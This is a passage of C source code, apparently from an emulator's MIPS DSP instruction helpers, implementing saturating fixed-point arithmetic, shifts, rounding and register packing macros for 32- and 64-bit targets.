CPUMIPSState *env) { int64_t acc; acc = ((int64_t)env->active_tc.HI[ac] << 32) | ((int64_t)env->active_tc.LO[ac] & 0xFFFFFFFF); p[0] = (shift == 0) ? (acc << 1) : (acc >> (shift - 1)); p[1] = (acc >> 63) & 0x01; } #ifdef TARGET_MIPS64 /* 128 bits long. p[0] is LO, p[1] is HI */ static inline void mipsdsp_rashift_acc(uint64_t *p, uint32_t ac, uint32_t shift, CPUMIPSState *env) { uint64_t tempB, tempA; tempB = env->active_tc.HI[ac]; tempA = env->active_tc.LO[ac]; shift = shift & 0x1F; if (shift == 0) { p[1] = tempB; p[0] = tempA; } else { p[0] = (tempB << (64 - shift)) | (tempA >> shift); p[1] = (int64_t)tempB >> shift; } } /* 128 bits long. 
p[0] is LO, p[1] is HI , p[2] is sign of HI.*/ static inline void mipsdsp_rndrashift_acc(uint64_t *p, uint32_t ac, uint32_t shift, CPUMIPSState *env) { int64_t tempB, tempA; tempB = env->active_tc.HI[ac]; tempA = env->active_tc.LO[ac]; shift = shift & 0x3F; if (shift == 0) { p[2] = tempB >> 63; p[1] = (tempB << 1) | (tempA >> 63); p[0] = tempA << 1; } else { p[0] = (tempB << (65 - shift)) | (tempA >> (shift - 1)); p[1] = (int64_t)tempB >> (shift - 1); if (tempB >= 0) { p[2] = 0x0; } else { p[2] = ~0ull; } } } #endif static inline int32_t mipsdsp_mul_q15_q15(int32_t ac, uint16_t a, uint16_t b, CPUMIPSState *env) { int32_t temp; if ((a == 0x8000) && (b == 0x8000)) { temp = 0x7FFFFFFF; set_DSPControl_overflow_flag(1, 16 + ac, env); } else { temp = ((int16_t)a * (int16_t)b) << 1; } return temp; } static inline int64_t mipsdsp_mul_q31_q31(int32_t ac, uint32_t a, uint32_t b, CPUMIPSState *env) { uint64_t temp; if ((a == 0x80000000) && (b == 0x80000000)) { temp = (0x01ull << 63) - 1; set_DSPControl_overflow_flag(1, 16 + ac, env); } else { temp = ((int64_t)(int32_t)a * (int32_t)b) << 1; } return temp; } static inline uint16_t mipsdsp_mul_u8_u8(uint8_t a, uint8_t b) { return (uint16_t)a * (uint16_t)b; } static inline uint16_t mipsdsp_mul_u8_u16(uint8_t a, uint16_t b, CPUMIPSState *env) { uint32_t tempI; tempI = (uint32_t)a * (uint32_t)b; if (tempI > 0x0000FFFF) { tempI = 0x0000FFFF; set_DSPControl_overflow_flag(1, 21, env); } return tempI & 0x0000FFFF; } #ifdef TARGET_MIPS64 static inline uint64_t mipsdsp_mul_u32_u32(uint32_t a, uint32_t b) { return (uint64_t)a * (uint64_t)b; } #endif static inline int16_t mipsdsp_rndq15_mul_q15_q15(uint16_t a, uint16_t b, CPUMIPSState *env) { uint32_t temp; if ((a == 0x8000) && (b == 0x8000)) { temp = 0x7FFF0000; set_DSPControl_overflow_flag(1, 21, env); } else { temp = ((int16_t)a * (int16_t)b) << 1; temp = temp + 0x00008000; } return (temp & 0xFFFF0000) >> 16; } static inline int32_t mipsdsp_sat16_mul_q15_q15(uint16_t a, uint16_t b, CPUMIPSState *env) { int32_t temp; if ((a == 0x8000) && (b == 0x8000)) { temp = 0x7FFF0000; set_DSPControl_overflow_flag(1, 21, env); } else { temp = (int16_t)a * (int16_t)b; temp = temp << 1; } return (temp >> 16) & 0x0000FFFF; } static inline uint16_t mipsdsp_trunc16_sat16_round(int32_t a, CPUMIPSState *env) { uint16_t temp; /* * The value 0x00008000 will be added to the input Q31 value, and the code * needs to check if the addition causes an overflow. Since a positive value * is added, overflow can happen in one direction only. 
*/ if (a > 0x7FFF7FFF) { temp = 0x7FFF; set_DSPControl_overflow_flag(1, 22, env); } else { temp = ((a + 0x8000) >> 16) & 0xFFFF; } return temp; } static inline uint8_t mipsdsp_sat8_reduce_precision(uint16_t a, CPUMIPSState *env) { uint16_t mag; uint32_t sign; sign = (a >> 15) & 0x01; mag = a & 0x7FFF; if (sign == 0) { if (mag > 0x7F80) { set_DSPControl_overflow_flag(1, 22, env); return 0xFF; } else { return (mag >> 7) & 0xFFFF; } } else { set_DSPControl_overflow_flag(1, 22, env); return 0x00; } } static inline uint8_t mipsdsp_lshift8(uint8_t a, uint8_t s, CPUMIPSState *env) { uint8_t discard; if (s != 0) { discard = a >> (8 - s); if (discard != 0x00) { set_DSPControl_overflow_flag(1, 22, env); } } return a << s; } static inline uint16_t mipsdsp_lshift16(uint16_t a, uint8_t s, CPUMIPSState *env) { uint16_t discard; if (s != 0) { discard = (int16_t)a >> (15 - s); if ((discard != 0x0000) && (discard != 0xFFFF)) { set_DSPControl_overflow_flag(1, 22, env); } } return a << s; } #ifdef TARGET_MIPS64 static inline uint32_t mipsdsp_lshift32(uint32_t a, uint8_t s, CPUMIPSState *env) { uint32_t discard; if (s == 0) { return a; } else { discard = (int32_t)a >> (31 - (s - 1)); if ((discard != 0x00000000) && (discard != 0xFFFFFFFF)) { set_DSPControl_overflow_flag(1, 22, env); } return a << s; } } #endif static inline uint16_t mipsdsp_sat16_lshift(uint16_t a, uint8_t s, CPUMIPSState *env) { uint8_t sign; uint16_t discard; if (s == 0) { return a; } else { sign = (a >> 15) & 0x01; if (sign != 0) { discard = (((0x01 << (16 - s)) - 1) << s) | ((a >> (14 - (s - 1))) & ((0x01 << s) - 1)); } else { discard = a >> (14 - (s - 1)); } if ((discard != 0x0000) && (discard != 0xFFFF)) { set_DSPControl_overflow_flag(1, 22, env); return (sign == 0) ? 0x7FFF : 0x8000; } else { return a << s; } } } static inline uint32_t mipsdsp_sat32_lshift(uint32_t a, uint8_t s, CPUMIPSState *env) { uint8_t sign; uint32_t discard; if (s == 0) { return a; } else { sign = (a >> 31) & 0x01; if (sign != 0) { discard = (((0x01 << (32 - s)) - 1) << s) | ((a >> (30 - (s - 1))) & ((0x01 << s) - 1)); } else { discard = a >> (30 - (s - 1)); } if ((discard != 0x00000000) && (discard != 0xFFFFFFFF)) { set_DSPControl_overflow_flag(1, 22, env); return (sign == 0) ? 
0x7FFFFFFF : 0x80000000; } else { return a << s; } } } static inline uint8_t mipsdsp_rnd8_rashift(uint8_t a, uint8_t s) { uint32_t temp; if (s == 0) { temp = (uint32_t)a << 1; } else { temp = (int32_t)(int8_t)a >> (s - 1); } return (temp + 1) >> 1; } static inline uint16_t mipsdsp_rnd16_rashift(uint16_t a, uint8_t s) { uint32_t temp; if (s == 0) { temp = (uint32_t)a << 1; } else { temp = (int32_t)(int16_t)a >> (s - 1); } return (temp + 1) >> 1; } static inline uint32_t mipsdsp_rnd32_rashift(uint32_t a, uint8_t s) { int64_t temp; if (s == 0) { temp = (uint64_t)a << 1; } else { temp = (int64_t)(int32_t)a >> (s - 1); } temp += 1; return (temp >> 1) & 0xFFFFFFFFull; } static inline uint16_t mipsdsp_sub_i16(int16_t a, int16_t b, CPUMIPSState *env) { int16_t temp; temp = a - b; if (MIPSDSP_OVERFLOW_SUB(a, b, temp, 0x8000)) { set_DSPControl_overflow_flag(1, 20, env); } return temp; } static inline uint16_t mipsdsp_sat16_sub(int16_t a, int16_t b, CPUMIPSState *env) { int16_t temp; temp = a - b; if (MIPSDSP_OVERFLOW_SUB(a, b, temp, 0x8000)) { if (a >= 0) { temp = 0x7FFF; } else { temp = 0x8000; } set_DSPControl_overflow_flag(1, 20, env); } return temp; } static inline uint32_t mipsdsp_sat32_sub(int32_t a, int32_t b, CPUMIPSState *env) { int32_t temp; temp = a - b; if (MIPSDSP_OVERFLOW_SUB(a, b, temp, 0x80000000)) { if (a >= 0) { temp = 0x7FFFFFFF; } else { temp = 0x80000000; } set_DSPControl_overflow_flag(1, 20, env); } return temp & 0xFFFFFFFFull; } static inline uint16_t mipsdsp_rshift1_sub_q16(int16_t a, int16_t b) { int32_t temp; temp = (int32_t)a - (int32_t)b; return (temp >> 1) & 0x0000FFFF; } static inline uint16_t mipsdsp_rrshift1_sub_q16(int16_t a, int16_t b) { int32_t temp; temp = (int32_t)a - (int32_t)b; temp += 1; return (temp >> 1) & 0x0000FFFF; } static inline uint32_t mipsdsp_rshift1_sub_q32(int32_t a, int32_t b) { int64_t temp; temp = (int64_t)a - (int64_t)b; return (temp >> 1) & 0xFFFFFFFFull; } static inline uint32_t mipsdsp_rrshift1_sub_q32(int32_t a, int32_t b) { int64_t temp; temp = (int64_t)a - (int64_t)b; temp += 1; return (temp >> 1) & 0xFFFFFFFFull; } static inline uint16_t mipsdsp_sub_u16_u16(uint16_t a, uint16_t b, CPUMIPSState *env) { uint8_t temp16; uint32_t temp; temp = (uint32_t)a - (uint32_t)b; temp16 = (temp >> 16) & 0x01; if (temp16 == 1) { set_DSPControl_overflow_flag(1, 20, env); } return temp & 0x0000FFFF; } static inline uint16_t mipsdsp_satu16_sub_u16_u16(uint16_t a, uint16_t b, CPUMIPSState *env) { uint8_t temp16; uint32_t temp; temp = (uint32_t)a - (uint32_t)b; temp16 = (temp >> 16) & 0x01; if (temp16 == 1) { temp = 0x0000; set_DSPControl_overflow_flag(1, 20, env); } return temp & 0x0000FFFF; } static inline uint8_t mipsdsp_sub_u8(uint8_t a, uint8_t b, CPUMIPSState *env) { uint8_t temp8; uint16_t temp; temp = (uint16_t)a - (uint16_t)b; temp8 = (temp >> 8) & 0x01; if (temp8 == 1) { set_DSPControl_overflow_flag(1, 20, env); } return temp & 0x00FF; } static inline uint8_t mipsdsp_satu8_sub(uint8_t a, uint8_t b, CPUMIPSState *env) { uint8_t temp8; uint16_t temp; temp = (uint16_t)a - (uint16_t)b; temp8 = (temp >> 8) & 0x01; if (temp8 == 1) { temp = 0x00; set_DSPControl_overflow_flag(1, 20, env); } return temp & 0x00FF; } #ifdef TARGET_MIPS64 static inline uint32_t mipsdsp_sub32(int32_t a, int32_t b, CPUMIPSState *env) { int32_t temp; temp = a - b; if (MIPSDSP_OVERFLOW_SUB(a, b, temp, 0x80000000)) { set_DSPControl_overflow_flag(1, 20, env); } return temp; } static inline int32_t mipsdsp_add_i32(int32_t a, int32_t b, CPUMIPSState *env) { int32_t temp; temp = a + b; 
if (MIPSDSP_OVERFLOW_ADD(a, b, temp, 0x80000000)) { set_DSPControl_overflow_flag(1, 20, env); } return temp; } #endif static inline int32_t mipsdsp_cmp_eq(int32_t a, int32_t b) { return a == b; } static inline int32_t mipsdsp_cmp_le(int32_t a, int32_t b) { return a <= b; } static inline int32_t mipsdsp_cmp_lt(int32_t a, int32_t b) { return a < b; } static inline int32_t mipsdsp_cmpu_eq(uint32_t a, uint32_t b) { return a == b; } static inline int32_t mipsdsp_cmpu_le(uint32_t a, uint32_t b) { return a <= b; } static inline int32_t mipsdsp_cmpu_lt(uint32_t a, uint32_t b) { return a < b; } /*** MIPS DSP internal functions end ***/ #define MIPSDSP_LHI 0xFFFFFFFF00000000ull #define MIPSDSP_LLO 0x00000000FFFFFFFFull #define MIPSDSP_HI 0xFFFF0000 #define MIPSDSP_LO 0x0000FFFF #define MIPSDSP_Q3 0xFF000000 #define MIPSDSP_Q2 0x00FF0000 #define MIPSDSP_Q1 0x0000FF00 #define MIPSDSP_Q0 0x000000FF #define MIPSDSP_SPLIT32_8(num, a, b, c, d) \ do { \ a = ((num) >> 24) & MIPSDSP_Q0; \ b = ((num) >> 16) & MIPSDSP_Q0; \ c = ((num) >> 8) & MIPSDSP_Q0; \ d = (num) & MIPSDSP_Q0; \ } while (0) #define MIPSDSP_SPLIT32_16(num, a, b) \ do { \ a = ((num) >> 16) & MIPSDSP_LO; \ b = (num) & MIPSDSP_LO; \ } while (0) #define MIPSDSP_RETURN32_8(a, b, c, d) ((target_long)(int32_t) \ (((uint32_t)(a) << 24) | \ ((uint32_t)(b) << 16) | \ ((uint32_t)(c) << 8) | \ ((uint32_t)(d) & 0xFF))) #define MIPSDSP_RETURN32_16(a, b) ((target_long)(int32_t) \ (((uint32_t)(a) << 16) | \ ((uint32_t)(b) & 0xFFFF))) #ifdef TARGET_MIPS64 #define MIPSDSP_SPLIT64_16(num, a, b, c, d) \ do { \ a = ((num) >> 48) & MIPSDSP_LO; \ b = ((num) >> 32) & MIPSDSP_LO; \ c = ((num) >> 16) & MIPSDSP_LO; \ d = (num) & MIPSDSP_LO; \ } while (0) #define MIPSDSP_SPLIT64_32(num, a, b) \ do { \ a = ((num) >> 32) & MIPSDSP_LLO; \ b = (num) & MIPSDSP_LLO; \ } while (0) #define MIPSDSP_RETURN64_16(a, b, c, d) (((uint64_t)(a) << 48) | \ ((uint64_t)(b) << 32) | \ ((uint64_t)(c) << 16) | \ (uint64_t)(d)) #define MIPSDSP_RETURN64_32(a, b) (((uint64_t)(a) << 32) | (uint64_t)(b)) #endif /** DSP Arithmetic Sub-class insns **/ #define MIPSDSP32_UNOP_ENV(name, func, element) \ target_ulong helper_##name(target_ulong rt, CPUMIPSState *env) \ { \ DSP32Value dt; \ unsigned int i; \ \ dt.sw[0] = rt; \ \ for (i = 0; i < ARRAY_SIZE(dt.element); i++) { \ dt.element[i] = mipsdsp_##func(dt.element[i], env); \ } \ \ return (target_long)dt.sw[0]; \ } MIPSDSP32_UNOP_ENV(absq_s_ph, sat_abs16, sh) MIPSDSP32_UNOP_ENV(absq_s_qb, sat_abs8, sb) MIPSDSP32_UNOP_ENV(absq_s_w, sat_abs32, sw) #undef MIPSDSP32_UNOP_ENV #if defined(TARGET_MIPS64) #define MIPSDSP64_UNOP_ENV(name, func, element) \ target_ulong helper_##name(target_ulong rt, CPUMIPSState *env) \ { \ DSP64Value dt; \ unsigned int i; \ \ dt.sl[0] = rt; \ \ for (i = 0; i < ARRAY_SIZE(dt.element); i++) { \ dt.element[i] = mipsdsp_##func(dt.element[i], env); \ } \ \ return dt.sl[0]; \ } MIPSDSP64_UNOP_ENV(absq_s_ob, sat_abs8, sb) MIPSDSP64_UNOP_ENV(absq_s_qh, sat_abs16, sh) MIPSDSP64_UNOP_ENV(absq_s_pw, sat_abs32, sw) #undef MIPSDSP64_UNOP_ENV #endif #define MIPSDSP32_BINOP(name, func, element) \ target_ulong helper_##name(target_ulong rs, target_ulong rt) \ { \ DSP32Value ds, dt; \ unsigned int i; \ \ ds.sw[0] = rs; \ dt.sw[0] = rt; \ \ for (i = 0; i < ARRAY_SIZE(ds.element); i++) { \ ds.element[i] = mipsdsp_##func(ds.element[i], dt.element[i]); \ } \ \ return (target_long)ds.sw[0]; \ } MIPSDSP32_BINOP(addqh_ph, rshift1_add_q16, sh); MIPSDSP32_BINOP(addqh_r_ph, rrshift1_add_q16, sh); MIPSDSP32_BINOP(addqh_r_w, rrshift1_add_q32, sw); 
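/*
 * Editor's note, not part of the original source: a minimal worked
 * example of the MIPSDSP32_BINOP pattern instantiated above and below.
 * helper_addqh_ph() views each 32-bit operand as two Q15 halfwords
 * through DSP32Value.sh[] and applies the halving add (a + b) >> 1 to
 * each lane independently. The sketch is illustrative only; the
 * function name is hypothetical.
 */
#if 0 /* illustrative sketch, not compiled */
static target_ulong example_addqh_ph(void)
{
    /* high lane: (0x7FFF + 0x0001) >> 1 = 0x4000
     * low lane:  (0x4000 + 0x2000) >> 1 = 0x3000 */
    target_ulong r = helper_addqh_ph(0x7FFF4000, 0x00012000);
    return r; /* == 0x40003000 */
}
#endif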
MIPSDSP32_BINOP(addqh_w, rshift1_add_q32, sw); MIPSDSP32_BINOP(adduh_qb, rshift1_add_u8, ub); MIPSDSP32_BINOP(adduh_r_qb, rrshift1_add_u8, ub); MIPSDSP32_BINOP(subqh_ph, rshift1_sub_q16, sh); MIPSDSP32_BINOP(subqh_r_ph, rrshift1_sub_q16, sh); MIPSDSP32_BINOP(subqh_r_w, rrshift1_sub_q32, sw); MIPSDSP32_BINOP(subqh_w, rshift1_sub_q32, sw); #undef MIPSDSP32_BINOP #define MIPSDSP32_BINOP_ENV(name, func, element) \ target_ulong helper_##name(target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ DSP32Value ds, dt; \ unsigned int i; \ \ ds.sw[0] = rs; \ dt.sw[0] = rt; \ \ for (i = 0 ; i < ARRAY_SIZE(ds.element); i++) { \ ds.element[i] = mipsdsp_##func(ds.element[i], dt.element[i], env); \ } \ \ return (target_long)ds.sw[0]; \ } MIPSDSP32_BINOP_ENV(addq_ph, add_i16, sh) MIPSDSP32_BINOP_ENV(addq_s_ph, sat_add_i16, sh) MIPSDSP32_BINOP_ENV(addq_s_w, sat_add_i32, sw); MIPSDSP32_BINOP_ENV(addu_ph, add_u16, sh) MIPSDSP32_BINOP_ENV(addu_qb, add_u8, ub); MIPSDSP32_BINOP_ENV(addu_s_ph, sat_add_u16, sh) MIPSDSP32_BINOP_ENV(addu_s_qb, sat_add_u8, ub); MIPSDSP32_BINOP_ENV(subq_ph, sub_i16, sh); MIPSDSP32_BINOP_ENV(subq_s_ph, sat16_sub, sh); MIPSDSP32_BINOP_ENV(subq_s_w, sat32_sub, sw); MIPSDSP32_BINOP_ENV(subu_ph, sub_u16_u16, sh); MIPSDSP32_BINOP_ENV(subu_qb, sub_u8, ub); MIPSDSP32_BINOP_ENV(subu_s_ph, satu16_sub_u16_u16, sh); MIPSDSP32_BINOP_ENV(subu_s_qb, satu8_sub, ub); #undef MIPSDSP32_BINOP_ENV #ifdef TARGET_MIPS64 #define MIPSDSP64_BINOP(name, func, element) \ target_ulong helper_##name(target_ulong rs, target_ulong rt) \ { \ DSP64Value ds, dt; \ unsigned int i; \ \ ds.sl[0] = rs; \ dt.sl[0] = rt; \ \ for (i = 0 ; i < ARRAY_SIZE(ds.element); i++) { \ ds.element[i] = mipsdsp_##func(ds.element[i], dt.element[i]); \ } \ \ return ds.sl[0]; \ } MIPSDSP64_BINOP(adduh_ob, rshift1_add_u8, ub); MIPSDSP64_BINOP(adduh_r_ob, rrshift1_add_u8, ub); MIPSDSP64_BINOP(subuh_ob, rshift1_sub_u8, ub); MIPSDSP64_BINOP(subuh_r_ob, rrshift1_sub_u8, ub); #undef MIPSDSP64_BINOP #define MIPSDSP64_BINOP_ENV(name, func, element) \ target_ulong helper_##name(target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ DSP64Value ds, dt; \ unsigned int i; \ \ ds.sl[0] = rs; \ dt.sl[0] = rt; \ \ for (i = 0 ; i < ARRAY_SIZE(ds.element); i++) { \ ds.element[i] = mipsdsp_##func(ds.element[i], dt.element[i], env); \ } \ \ return ds.sl[0]; \ } MIPSDSP64_BINOP_ENV(addq_pw, add_i32, sw); MIPSDSP64_BINOP_ENV(addq_qh, add_i16, sh); MIPSDSP64_BINOP_ENV(addq_s_pw, sat_add_i32, sw); MIPSDSP64_BINOP_ENV(addq_s_qh, sat_add_i16, sh); MIPSDSP64_BINOP_ENV(addu_ob, add_u8, uh); MIPSDSP64_BINOP_ENV(addu_qh, add_u16, uh); MIPSDSP64_BINOP_ENV(addu_s_ob, sat_add_u8, uh); MIPSDSP64_BINOP_ENV(addu_s_qh, sat_add_u16, uh); MIPSDSP64_BINOP_ENV(subq_pw, sub32, sw); MIPSDSP64_BINOP_ENV(subq_qh, sub_i16, sh); MIPSDSP64_BINOP_ENV(subq_s_pw, sat32_sub, sw); MIPSDSP64_BINOP_ENV(subq_s_qh, sat16_sub, sh); MIPSDSP64_BINOP_ENV(subu_ob, sub_u8, uh); MIPSDSP64_BINOP_ENV(subu_qh, sub_u16_u16, uh); MIPSDSP64_BINOP_ENV(subu_s_ob, satu8_sub, uh); MIPSDSP64_BINOP_ENV(subu_s_qh, satu16_sub_u16_u16, uh); #undef MIPSDSP64_BINOP_ENV #endif #define SUBUH_QB(name, var) \ target_ulong helper_##name##_qb(target_ulong rs, target_ulong rt) \ { \ uint8_t rs3, rs2, rs1, rs0; \ uint8_t rt3, rt2, rt1, rt0; \ uint8_t tempD, tempC, tempB, tempA; \ \ MIPSDSP_SPLIT32_8(rs, rs3, rs2, rs1, rs0); \ MIPSDSP_SPLIT32_8(rt, rt3, rt2, rt1, rt0); \ \ tempD = ((uint16_t)rs3 - (uint16_t)rt3 + var) >> 1; \ tempC = ((uint16_t)rs2 - (uint16_t)rt2 + var) >> 1; \ tempB = ((uint16_t)rs1 - (uint16_t)rt1 
+ var) >> 1; \ tempA = ((uint16_t)rs0 - (uint16_t)rt0 + var) >> 1; \ \ return ((uint32_t)tempD << 24) | ((uint32_t)tempC << 16) | \ ((uint32_t)tempB << 8) | ((uint32_t)tempA); \ } SUBUH_QB(subuh, 0); SUBUH_QB(subuh_r, 1); #undef SUBUH_QB target_ulong helper_addsc(target_ulong rs, target_ulong rt, CPUMIPSState *env) { uint64_t temp, tempRs, tempRt; bool flag; tempRs = (uint64_t)rs & MIPSDSP_LLO; tempRt = (uint64_t)rt & MIPSDSP_LLO; temp = tempRs + tempRt; flag = (temp & 0x0100000000ull) >> 32; set_DSPControl_carryflag(flag, env); return (target_long)(int32_t)(temp & MIPSDSP_LLO); } target_ulong helper_addwc(target_ulong rs, target_ulong rt, CPUMIPSState *env) { uint32_t rd; int32_t temp32, temp31; int64_t tempL; tempL = (int64_t)(int32_t)rs + (int64_t)(int32_t)rt + get_DSPControl_carryflag(env); temp31 = (tempL >> 31) & 0x01; temp32 = (tempL >> 32) & 0x01; if (temp31 != temp32) { set_DSPControl_overflow_flag(1, 20, env); } rd = tempL & MIPSDSP_LLO; return (target_long)(int32_t)rd; } target_ulong helper_modsub(target_ulong rs, target_ulong rt) { int32_t decr; uint16_t lastindex; target_ulong rd; decr = rt & MIPSDSP_Q0; lastindex = (rt >> 8) & MIPSDSP_LO; if ((rs & MIPSDSP_LLO) == 0x00000000) { rd = (target_ulong)lastindex; } else { rd = rs - decr; } return rd; } target_ulong helper_raddu_w_qb(target_ulong rs) { target_ulong ret = 0; DSP32Value ds; unsigned int i; ds.uw[0] = rs; for (i = 0; i < 4; i++) { ret += ds.ub[i]; } return ret; } #if defined(TARGET_MIPS64) target_ulong helper_raddu_l_ob(target_ulong rs) { target_ulong ret = 0; DSP64Value ds; unsigned int i; ds.ul[0] = rs; for (i = 0; i < 8; i++) { ret += ds.ub[i]; } return ret; } #endif #define PRECR_QB_PH(name, a, b)\ target_ulong helper_##name##_qb_ph(target_ulong rs, target_ulong rt) \ { \ uint8_t tempD, tempC, tempB, tempA; \ \ tempD = (rs >> a) & MIPSDSP_Q0; \ tempC = (rs >> b) & MIPSDSP_Q0; \ tempB = (rt >> a) & MIPSDSP_Q0; \ tempA = (rt >> b) & MIPSDSP_Q0; \ \ return MIPSDSP_RETURN32_8(tempD, tempC, tempB, tempA); \ } PRECR_QB_PH(precr, 16, 0); PRECR_QB_PH(precrq, 24, 8); #undef PRECR_QB_PH target_ulong helper_precr_sra_ph_w(uint32_t sa, target_ulong rs, target_ulong rt) { uint16_t tempB, tempA; tempB = ((int32_t)rt >> sa) & MIPSDSP_LO; tempA = ((int32_t)rs >> sa) & MIPSDSP_LO; return MIPSDSP_RETURN32_16(tempB, tempA); } target_ulong helper_precr_sra_r_ph_w(uint32_t sa, target_ulong rs, target_ulong rt) { uint64_t tempB, tempA; /* If sa = 0, then (sa - 1) = -1 will cause a shift error, so we need the else branch.
*/ if (sa == 0) { tempB = (rt & MIPSDSP_LO) << 1; tempA = (rs & MIPSDSP_LO) << 1; } else { tempB = ((int32_t)rt >> (sa - 1)) + 1; tempA = ((int32_t)rs >> (sa - 1)) + 1; } rt = (((tempB >> 1) & MIPSDSP_LO) << 16) | ((tempA >> 1) & MIPSDSP_LO); return (target_long)(int32_t)rt; } target_ulong helper_precrq_ph_w(target_ulong rs, target_ulong rt) { uint16_t tempB, tempA; tempB = (rs & MIPSDSP_HI) >> 16; tempA = (rt & MIPSDSP_HI) >> 16; return MIPSDSP_RETURN32_16(tempB, tempA); } target_ulong helper_precrq_rs_ph_w(target_ulong rs, target_ulong rt, CPUMIPSState *env) { uint16_t tempB, tempA; tempB = mipsdsp_trunc16_sat16_round(rs, env); tempA = mipsdsp_trunc16_sat16_round(rt, env); return MIPSDSP_RETURN32_16(tempB, tempA); } #if defined(TARGET_MIPS64) target_ulong helper_precr_ob_qh(target_ulong rs, target_ulong rt) { uint8_t rs6, rs4, rs2, rs0; uint8_t rt6, rt4, rt2, rt0; uint64_t temp; rs6 = (rs >> 48) & MIPSDSP_Q0; rs4 = (rs >> 32) & MIPSDSP_Q0; rs2 = (rs >> 16) & MIPSDSP_Q0; rs0 = rs & MIPSDSP_Q0; rt6 = (rt >> 48) & MIPSDSP_Q0; rt4 = (rt >> 32) & MIPSDSP_Q0; rt2 = (rt >> 16) & MIPSDSP_Q0; rt0 = rt & MIPSDSP_Q0; temp = ((uint64_t)rs6 << 56) | ((uint64_t)rs4 << 48) | ((uint64_t)rs2 << 40) | ((uint64_t)rs0 << 32) | ((uint64_t)rt6 << 24) | ((uint64_t)rt4 << 16) | ((uint64_t)rt2 << 8) | (uint64_t)rt0; return temp; } /* * In case sa == 0, use rt2, rt0, rs2, rs0. * In case sa != 0, use rt3, rt1, rs3, rs1. */ #define PRECR_QH_PW(name, var) \ target_ulong helper_precr_##name##_qh_pw(target_ulong rs, \ target_ulong rt, \ uint32_t sa) \ { \ uint16_t rs3, rs2, rs1, rs0; \ uint16_t rt3, rt2, rt1, rt0; \ uint16_t tempD, tempC, tempB, tempA; \ \ MIPSDSP_SPLIT64_16(rs, rs3, rs2, rs1, rs0); \ MIPSDSP_SPLIT64_16(rt, rt3, rt2, rt1, rt0); \ \ if (sa == 0) { \ tempD = rt2 << var; \ tempC = rt0 << var; \ tempB = rs2 << var; \ tempA = rs0 << var; \ } else { \ tempD = (((int16_t)rt3 >> sa) + var) >> var; \ tempC = (((int16_t)rt1 >> sa) + var) >> var; \ tempB = (((int16_t)rs3 >> sa) + var) >> var; \ tempA = (((int16_t)rs1 >> sa) + var) >> var; \ } \ \ return MIPSDSP_RETURN64_16(tempD, tempC, tempB, tempA); \ } PRECR_QH_PW(sra, 0); PRECR_QH_PW(sra_r, 1); #undef PRECR_QH_PW target_ulong helper_precrq_ob_qh(target_ulong rs, target_ulong rt) { uint8_t rs6, rs4, rs2, rs0; uint8_t rt6, rt4, rt2, rt0; uint64_t temp; rs6 = (rs >> 56) & MIPSDSP_Q0; rs4 = (rs >> 40) & MIPSDSP_Q0; rs2 = (rs >> 24) & MIPSDSP_Q0; rs0 = (rs >> 8) & MIPSDSP_Q0; rt6 = (rt >> 56) & MIPSDSP_Q0; rt4 = (rt >> 40) & MIPSDSP_Q0; rt2 = (rt >> 24) & MIPSDSP_Q0; rt0 = (rt >> 8) & MIPSDSP_Q0; temp = ((uint64_t)rs6 << 56) | ((uint64_t)rs4 << 48) | ((uint64_t)rs2 << 40) | ((uint64_t)rs0 << 32) | ((uint64_t)rt6 << 24) | ((uint64_t)rt4 << 16) | ((uint64_t)rt2 << 8) | (uint64_t)rt0; return temp; } target_ulong helper_precrq_qh_pw(target_ulong rs, target_ulong rt) { uint16_t tempD, tempC, tempB, tempA; tempD = (rs >> 48) & MIPSDSP_LO; tempC = (rs >> 16) & MIPSDSP_LO; tempB = (rt >> 48) & MIPSDSP_LO; tempA = (rt >> 16) & MIPSDSP_LO; return MIPSDSP_RETURN64_16(tempD, tempC, tempB, tempA); } target_ulong helper_precrq_rs_qh_pw(target_ulong rs, target_ulong rt, CPUMIPSState *env) { uint32_t rs2, rs0; uint32_t rt2, rt0; uint16_t tempD, tempC, tempB, tempA; rs2 = (rs >> 32) & MIPSDSP_LLO; rs0 = rs & MIPSDSP_LLO; rt2 = (rt >> 32) & MIPSDSP_LLO; rt0 = rt & MIPSDSP_LLO; tempD = mipsdsp_trunc16_sat16_round(rs2, env); tempC = mipsdsp_trunc16_sat16_round(rs0, env); tempB = mipsdsp_trunc16_sat16_round(rt2, env); tempA = mipsdsp_trunc16_sat16_round(rt0, env); return 
MIPSDSP_RETURN64_16(tempD, tempC, tempB, tempA); } target_ulong helper_precrq_pw_l(target_ulong rs, target_ulong rt) { uint32_t tempB, tempA; tempB = (rs >> 32) & MIPSDSP_LLO; tempA = (rt >> 32) & MIPSDSP_LLO; return MIPSDSP_RETURN64_32(tempB, tempA); } #endif target_ulong helper_precrqu_s_qb_ph(target_ulong rs, target_ulong rt, CPUMIPSState *env) { uint8_t tempD, tempC, tempB, tempA; uint16_t rsh, rsl, rth, rtl; rsh = (rs & MIPSDSP_HI) >> 16; rsl = rs & MIPSDSP_LO; rth = (rt & MIPSDSP_HI) >> 16; rtl = rt & MIPSDSP_LO; tempD = mipsdsp_sat8_reduce_precision(rsh, env); tempC = mipsdsp_sat8_reduce_precision(rsl, env); tempB = mipsdsp_sat8_reduce_precision(rth, env); tempA = mipsdsp_sat8_reduce_precision(rtl, env); return MIPSDSP_RETURN32_8(tempD, tempC, tempB, tempA); } #if defined(TARGET_MIPS64) target_ulong helper_precrqu_s_ob_qh(target_ulong rs, target_ulong rt, CPUMIPSState *env) { int i; uint16_t rs3, rs2, rs1, rs0; uint16_t rt3, rt2, rt1, rt0; uint8_t temp[8]; uint64_t result; result = 0; MIPSDSP_SPLIT64_16(rs, rs3, rs2, rs1, rs0); MIPSDSP_SPLIT64_16(rt, rt3, rt2, rt1, rt0); temp[7] = mipsdsp_sat8_reduce_precision(rs3, env); temp[6] = mipsdsp_sat8_reduce_precision(rs2, env); temp[5] = mipsdsp_sat8_reduce_precision(rs1, env); temp[4] = mipsdsp_sat8_reduce_precision(rs0, env); temp[3] = mipsdsp_sat8_reduce_precision(rt3, env); temp[2] = mipsdsp_sat8_reduce_precision(rt2, env); temp[1] = mipsdsp_sat8_reduce_precision(rt1, env); temp[0] = mipsdsp_sat8_reduce_precision(rt0, env); for (i = 0; i < 8; i++) { result |= (uint64_t)temp[i] << (8 * i); } return result; } #define PRECEQ_PW(name, a, b) \ target_ulong helper_preceq_pw_##name(target_ulong rt) \ { \ uint16_t tempB, tempA; \ uint32_t tempBI, tempAI; \ \ tempB = (rt >> a) & 